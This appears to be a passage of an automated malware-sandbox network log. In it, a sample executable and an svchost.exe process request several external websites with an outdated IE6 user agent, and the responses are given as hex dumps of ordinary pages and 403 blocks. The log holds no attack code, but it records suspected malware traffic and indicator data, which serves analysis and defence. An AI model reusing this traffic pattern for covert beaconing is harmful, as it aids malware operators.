                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1119INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        69192.168.2.6567585.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1121OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:18 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1122INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:18 UTC1138INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                        Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1154INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1170INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        7192.168.2.652635188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC136OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC136INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:13 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SmLVBr%2B73yDgi%2BGcHh6g50MgvH1ouCEsat5Kuku5t2hj0JhbeLDEEAsRZoy9CLGc1Yyjw9s4SR0SAtX%2Fqr2MxN5kU7JX0Ld%2FdNwhrylYD7WEIc0Ey0LETpZpM392"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8165f9337f7-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC137INData Raw: 31 65 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC137INData Raw: 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20
                                                                                                                                                                                                                                                                        Data Ascii: idth,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC138INData Raw: 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 68 6f 30 36 32 76 50 78 75 74 7a 4c 4d 44 30 66 51 56 59 4d 35 5a 49 64 4a 33 48 70 50 55 4a 7a 59 6f 30 70 78 38 65 6f 7a 58 30 2d 31 36 37 38 34 33 31 33 37 33 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 4c 56 58 57 66 78 78 74 6c 7a 2e 69 43 33 2e 32 66 4f 43 7a 63 33 47 4d 6a 4f 57 67 54 51 77 63 4c 66 62 51 44 6e 78 63 5a 4a 77 2d 31 36 37 38 34 33 31 33 37 33 2d
                                                                                                                                                                                                                                                                        Data Ascii: ion="/?__cf_chl_f_tk=ho062vPxutzLMD0fQVYM5ZIdJ3HpPUJzYo0px8eozX0-1678431373-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="LVXWfxxtlz.iC3.2fOCzc3GMjOWgTQwcLfbQDnxcZJw-1678431373-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC140INData Raw: 59 41 6c 47 2d 44 51 36 5f 4b 72 32 53 69 36 50 31 77 7a 37 6e 59 37 41 50 44 6d 33 69 36 67 50 46 4b 32 65 5f 38 6c 6b 38 35 77 38 5a 76 76 44 51 77 38 54 30 6a 4b 74 35 63 6d 6e 4c 57 59 41 50 64 30 70 78 6f 62 64 79 63 57 5f 37 74 4b 6d 2d 56 38 35 73 65 62 6a 30 54 76 2d 68 71 46 5a 49 79 33 6e 4d 6f 78 44 63 5a 63 51 4c 78 32 64 2d 6e 68 70 44 6f 4e 56 33 4a 70 63 5f 64 48 6c 7a 4c 4f 73 48 54 30 2d 39 5f 75 4a 46 75 57 79 4f 6c 69 76 73 44 30 41 4d 78 57 4a 37 72 33 51 31 56 41 70 4b 54 46 79 45 44 38 49 77 49 74 4f 65 7a 4d 4d 4c 64 5f 38 36 5a 77 55 68 39 37 38 64 5f 77 78 33 50 49 55 65 66 44 54 34 32 56 6f 4f 63 6a 76 73 6c 44 57 77 73 35 66 30 64 36 2d 63 6f 79 4e 30 73 48 32 5f 54 79 35 39 52 55 57 79 4f 68 78 34 41 67 42 35 52 34 31 65 4f 7a
                                                                                                                                                                                                                                                                        Data Ascii: YAlG-DQ6_Kr2Si6P1wz7nY7APDm3i6gPFK2e_8lk85w8ZvvDQw8T0jKt5cmnLWYAPd0pxobdycW_7tKm-V85sebj0Tv-hqFZIy3nMoxDcZcQLx2d-nhpDoNV3Jpc_dHlzLOsHT0-9_uJFuWyOlivsD0AMxWJ7r3Q1VApKTFyED8IwItOezMMLd_86ZwUh978d_wx3PIUefDT42VoOcjvslDWws5f0d6-coyN0sH2_Ty59RUWyOhx4AgB5R41eOz
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC141INData Raw: 20 20 63 52 61 79 3a 20 27 37 61 35 39 61 38 31 36 35 66 39 33 33 37 66 37 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 35 38 31 35 39 37 62 33 62 64 38 31 62 36 61 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 68 6f 30 36 32 76 50 78 75 74 7a 4c 4d 44 30 66 51 56 59 4d 35 5a 49 64 4a 33 48 70 50 55 4a 7a 59 6f 30 70 78 38 65 6f 7a 58 30 2d 31 36 37 38 34 33 31 33 37 33 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a
                                                                                                                                                                                                                                                                        Data Ascii: cRay: '7a59a8165f9337f7', cHash: '581597b3bd81b6a', cUPMDTk: "\/?__cf_chl_tk=ho062vPxutzLMD0fQVYM5ZIdJ3HpPUJzYo0px8eozX0-1678431373-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC142INData Raw: 2b 38 74 37 55 7a 75 69 67 72 75 2f 48 63 75 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 6c 31 65 74 36 7a 53 39 77 6b 67 33 32 6c 7a 55 50 39 65 65 78 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41
                                                                                                                                                                                                                                                                        Data Ascii: +8t7Uzuigru/Hcuw==', i2: 'l1et6zS9wkg32lzUP9eexw==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhA
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC144INData Raw: 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: .cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="conten
                                                                                                                                                                                                                                                                        2023-03-10 06:56:13 UTC145INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        70192.168.2.65649549.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1172OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        71192.168.2.656879185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1173OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1173INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1173INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        72192.168.2.656949188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1174OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1174INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rOEHk17s5%2BLnwMX98UbUlhnxmOcM5BtkcZIsZK%2FOU5F4csFsp2sB4sIqaiYJLYF24Fiu1exS5RZWn5XAxOrtajffUlMosjOUoMjk69gWb0a4aOvIfBeOxr851FfK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8381e659b63-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
